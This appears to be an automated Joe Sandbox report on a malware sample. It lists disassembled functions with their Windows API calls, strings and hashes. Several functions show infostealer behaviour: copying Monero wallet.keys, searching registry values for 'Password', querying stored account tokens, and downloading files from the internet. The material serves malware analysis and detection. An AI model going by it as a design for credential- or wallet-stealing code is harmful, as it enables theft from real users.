                                • Opcode ID: be795442152d1f0766032755ad620bd717835f9d25826021096abb060fab7cfe
                                • Instruction ID: eddd3d649d327941bf24f182413f48b2689a57455c5261925aa95fded5dd8aef
                                • Opcode Fuzzy Hash: be795442152d1f0766032755ad620bd717835f9d25826021096abb060fab7cfe
                                • Instruction Fuzzy Hash: B37178B6D00208ABCB14FBA0EC85FEE73B9BF48300F045599F515A7181EA75DB56CB91
                                Function 00EC1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EC12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EC12B4
                                  • Part of subcall function 00EC12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00EC12BB
                                  • Part of subcall function 00EC12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00EC12D7
                                  • Part of subcall function 00EC12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00EC12F5
                                  • Part of subcall function 00EC12A0: RegCloseKey.ADVAPI32(?), ref: 00EC12FF
                                • lstrcat.KERNEL32(?,00000000), ref: 00EC134F
                                • lstrlen.KERNEL32(?), ref: 00EC135C
                                • lstrcat.KERNEL32(?,.keys), ref: 00EC1377
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00ED8B60: GetSystemTime.KERNEL32(00EE0E1A,00DAA5F0,00EE05AE,?,?,00EC13F9,?,0000001A,00EE0E1A,00000000,?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00ED8B86
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00EC1465
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00EC99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EC99EC
                                  • Part of subcall function 00EC99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EC9A11
                                  • Part of subcall function 00EC99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EC9A31
                                  • Part of subcall function 00EC99C0: ReadFile.KERNEL32(000000FF,?,00000000,00EC148F,00000000), ref: 00EC9A5A
                                  • Part of subcall function 00EC99C0: LocalFree.KERNEL32(00EC148F), ref: 00EC9A90
                                  • Part of subcall function 00EC99C0: CloseHandle.KERNEL32(000000FF), ref: 00EC9A9A
                                • DeleteFileA.KERNEL32(00000000), ref: 00EC14EF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                • API String ID: 3478931302-218353709
                                • Opcode ID: e87f93ef8b75be0cd22cec3adeeba411357de0021842d0d2281cdfea1870f8d8
                                • Instruction ID: a864373b801ab07863ac24c9c6d3a338ce40dd81775a3a2d2e8dd2b880be44c9
                                • Opcode Fuzzy Hash: e87f93ef8b75be0cd22cec3adeeba411357de0021842d0d2281cdfea1870f8d8
                                • Instruction Fuzzy Hash: 175175B2D102185BCB19EB60DD96FED73BCEF50300F4451B9B60A72182EE705B86CB95
                                Function 00EC75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EC72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00EC733A
                                  • Part of subcall function 00EC72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00EC73B1
                                  • Part of subcall function 00EC72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00EC740D
                                  • Part of subcall function 00EC72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00EC7452
                                  • Part of subcall function 00EC72D0: HeapFree.KERNEL32(00000000), ref: 00EC7459
                                • lstrcat.KERNEL32(00000000,00EE17FC), ref: 00EC7606
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00EC7648
                                • lstrcat.KERNEL32(00000000, : ), ref: 00EC765A
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00EC768F
                                • lstrcat.KERNEL32(00000000,00EE1804), ref: 00EC76A0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00EC76D3
                                • lstrcat.KERNEL32(00000000,00EE1808), ref: 00EC76ED
                                • task.LIBCPMTD ref: 00EC76FB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                • String ID: :
                                • API String ID: 2677904052-3653984579
                                • Opcode ID: eeecbfa1ad6ce0bc3e6a2ce0ce79fcc8621b33ca385e0dce6960fc7f4998a2d0
                                • Instruction ID: c0a799a38b44c012a6b0c8bd4e4b53906d9b268a07007b2f52af7c2a423af6fe
                                • Opcode Fuzzy Hash: eeecbfa1ad6ce0bc3e6a2ce0ce79fcc8621b33ca385e0dce6960fc7f4998a2d0
                                • Instruction Fuzzy Hash: 74314F72D00209DFCB19EBA4EE45EEE77B4BF48301B10512DF112B7284DA75AA87CB50
                                Function 00EC60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00EC47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EC4839
                                  • Part of subcall function 00EC47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EC4849
                                • InternetOpenA.WININET(00EE0DF7,00000001,00000000,00000000,00000000), ref: 00EC610F
                                • StrCmpCA.SHLWAPI(?,00DAE9C0), ref: 00EC6147
                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00EC618F
                                • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00EC61B3
                                • InternetReadFile.WININET(?,?,00000400,?), ref: 00EC61DC
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00EC620A
                                • CloseHandle.KERNEL32(?,?,00000400), ref: 00EC6249
                                • InternetCloseHandle.WININET(?), ref: 00EC6253
                                • InternetCloseHandle.WININET(00000000), ref: 00EC6260
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                • String ID:
                                • API String ID: 2507841554-0
                                • Opcode ID: 69b8f4bf2c7eff5b8abf871255a792c38eb20627094dc988185b4e1f3073f052
                                • Instruction ID: e0911f4c0bf2d9b16d8feea643ebae9d7aa14b3143bd26ce22822ad91371458d
                                • Opcode Fuzzy Hash: 69b8f4bf2c7eff5b8abf871255a792c38eb20627094dc988185b4e1f3073f052
                                • Instruction Fuzzy Hash: AB5180B1900218ABDB24DF50DD49FEE77B8EF44305F1090A9B605B72C0DBB66A86CF95
                                Function 00EC72D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00EC733A
                                • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00EC73B1
                                • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00EC740D
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00EC7452
                                • HeapFree.KERNEL32(00000000), ref: 00EC7459
                                • task.LIBCPMTD ref: 00EC7555
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeOpenProcessValuetask
                                • String ID: Password
                                • API String ID: 775622407-3434357891
                                • Opcode ID: e4dd8114a8b2ed5b322c94adef7def945ef410009e41bcec2ab7ce961eed7ce7
                                • Instruction ID: 703c6d87661752b6833fd219ebc6f3ac215aeb7cb548615c18adbfcf05a515d4
                                • Opcode Fuzzy Hash: e4dd8114a8b2ed5b322c94adef7def945ef410009e41bcec2ab7ce961eed7ce7
                                • Instruction Fuzzy Hash: 87614CB590425C9BDB24DB50DE45FDAB7B8BF44300F0091E9E689B6141DBB15BCACF90
                                Function 00ECBA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                • lstrlen.KERNEL32(00000000), ref: 00ECBC9F
                                  • Part of subcall function 00ED8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00ED8E52
                                • StrStrA.SHLWAPI(00000000,AccountId), ref: 00ECBCCD
                                • lstrlen.KERNEL32(00000000), ref: 00ECBDA5
                                • lstrlen.KERNEL32(00000000), ref: 00ECBDB9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                • API String ID: 3073930149-1079375795
                                • Opcode ID: cde22d5432183aff22937e3224ebf6cc563efd0e9db80606143d2d12e17f1a1e
                                • Instruction ID: de55d2ae355b58e6b2fd3ca424d84b5ce2cc7b0de73918fb832eeda85f847585
                                • Opcode Fuzzy Hash: cde22d5432183aff22937e3224ebf6cc563efd0e9db80606143d2d12e17f1a1e
                                • Instruction Fuzzy Hash: B7B154769102089BCB18EBA0DD96EEE73B8EF54300F44517AF50673191EF746B4ACB62
                                Function 00ED6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess$DefaultLangUser
                                • String ID: *
                                • API String ID: 1494266314-163128923
                                • Opcode ID: 8f4dea8746271e6dec0a11fab60ff8d6074e677e69c2eeb54fc87876b2b0f037
                                • Instruction ID: bdfce90d79280427a8357d8ed292d37a123c2af8bcea4a5137fdc926cfd00f09
                                • Opcode Fuzzy Hash: 8f4dea8746271e6dec0a11fab60ff8d6074e677e69c2eeb54fc87876b2b0f037
                                • Instruction Fuzzy Hash: 44F05E30D04309EFD3599FE0F50976C7B74FF04707F0441AAE61A97285D6B14B819B95
                                Function 00EC4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00EC4FCA
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EC4FD1
                                • InternetOpenA.WININET(00EE0DDF,00000000,00000000,00000000,00000000), ref: 00EC4FEA
                                • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00EC5011
                                • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00EC5041
                                • InternetCloseHandle.WININET(?), ref: 00EC50B9
                                • InternetCloseHandle.WININET(?), ref: 00EC50C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                • String ID:
                                • API String ID: 3066467675-0
                                • Opcode ID: 5376bcaeec1b1ecd4bce3d7c54679d6e35da19150f5ff08bad6669383a67ce09
                                • Instruction ID: bfa57d67782ba7d549078ddd8b50a7ef4c362f671ed891c2ba8de384b8a759b4
                                • Opcode Fuzzy Hash: 5376bcaeec1b1ecd4bce3d7c54679d6e35da19150f5ff08bad6669383a67ce09
                                • Instruction Fuzzy Hash: 223107B5E0021CABDB24CF54DD85BDCB7B4EB48704F1081E9EA09B7285D7B16AC58F98
                                Function 00ED8100 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00DADF20,00000000,?,00EE0E2C,00000000,?,00000000), ref: 00ED8130
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED8137
                                • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00ED8158
                                • wsprintfA.USER32 ref: 00ED81AC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB$@
                                • API String ID: 2922868504-3474575989
                                • Opcode ID: fc23ab20addbf9cd8aa6d8e7f0d344aa603a851581c787b85166d1f43d642901
                                • Instruction ID: b6ee2052684381bc1372dd8d7922b62df2d91b1374f92d0bbcddbae7d056d318
                                • Opcode Fuzzy Hash: fc23ab20addbf9cd8aa6d8e7f0d344aa603a851581c787b85166d1f43d642901
                                • Instruction Fuzzy Hash: CF215EB1E44318ABDB14DFD4DD49FAEB7B8FB44B00F10421AF615BB284D7B869018BA4
                                Function 00ED83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                Download Yara Rule
                                APIs
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00ED8426
                                • wsprintfA.USER32 ref: 00ED8459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00ED847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 00ED848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00ED8499
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                • RegQueryValueExA.ADVAPI32(00000000,00DADDD0,00000000,000F003F,?,00000400), ref: 00ED84EC
                                • lstrlen.KERNEL32(?), ref: 00ED8501
                                • RegQueryValueExA.ADVAPI32(00000000,00DADEC0,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00EE0B34), ref: 00ED8599
                                • RegCloseKey.ADVAPI32(00000000), ref: 00ED8608
                                • RegCloseKey.ADVAPI32(00000000), ref: 00ED861A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
